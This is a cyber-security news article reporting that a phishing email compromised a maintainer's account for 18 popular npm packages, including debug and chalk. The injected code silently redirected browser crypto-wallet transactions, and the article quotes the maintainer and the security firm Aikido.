Login
iscover
Share this article on:
Powered by
MOMENTUM
MEDIA
Powered by MOMENTUMMEDIA
Multiple npm packages have been compromised by a phishing attack in an attempt to spread crypto malware to billions of victims.
The maintainer for several highly popular npm debug and chalk packages has revealed he was recently the victim of a phishing attack, which led to the compromise of all 18 packages.
“Yep, I’ve been pwned. 2FA reset email, looked very legitimate,” Josh Junon said in a 9 September post to Bluesky.
“Only NPM affected. I’ve sent an email off to @npmjs.bsky.social to see if I can get access again.
“Sorry everyone, I should have paid more attention. Not like me; have had a stressful week. Will work to get this cleaned up.”
The phishing email appeared to come from a legitimate email address linked to npmjs.com, support[at]npmjs[dot]help, complete with official-looking branding, but which was in fact malicious.
Soon after, the unidentified threat actor was able to access and inject malicious code into the following packages:
In total, the packages represent more than 2 billion downloads every week. Soon after their code was altered, cyber security firm Aikido started receiving alerts regarding the corrupted packages and began an investigation after alerting the maintainer.
“The packages were updated to contain a piece of code that would be executed on the client of a website, which silently intercepts crypto and web3 activity in the browser, manipulates wallet interactions, and rewrites payment destinations so that funds and approvals are redirected to attacker-controlled accounts without any obvious signs to the user,” Aikido said in an 8 September blog post.
“What makes it dangerous is that it operates at multiple layers: altering content shown on websites, tampering with API calls, and manipulating what users’ apps believe they are signing. Even if the interface looks correct, the underlying transaction can be redirected in the background.”
According to Aikido, the malicious domain was registered several days before the successful phishing attempt.
The maintainer of the packages was able to delete most of the compromised packages; however, one – simple-swizzle – was still live at the time of writing.
npm was acquired by GitHub in 2020 and describes itself as “a critical part of the JavaScript community” that supports “one of the largest developer ecosystems in the world”.
David Hollingworth has been writing about technology for over 20 years, and has worked for a range of print and online titles in his career. He is enjoying getting to grips with cyber security, especially when it lets him talk about Lego.
Be the first to hear the latest developments in the cyber industry.
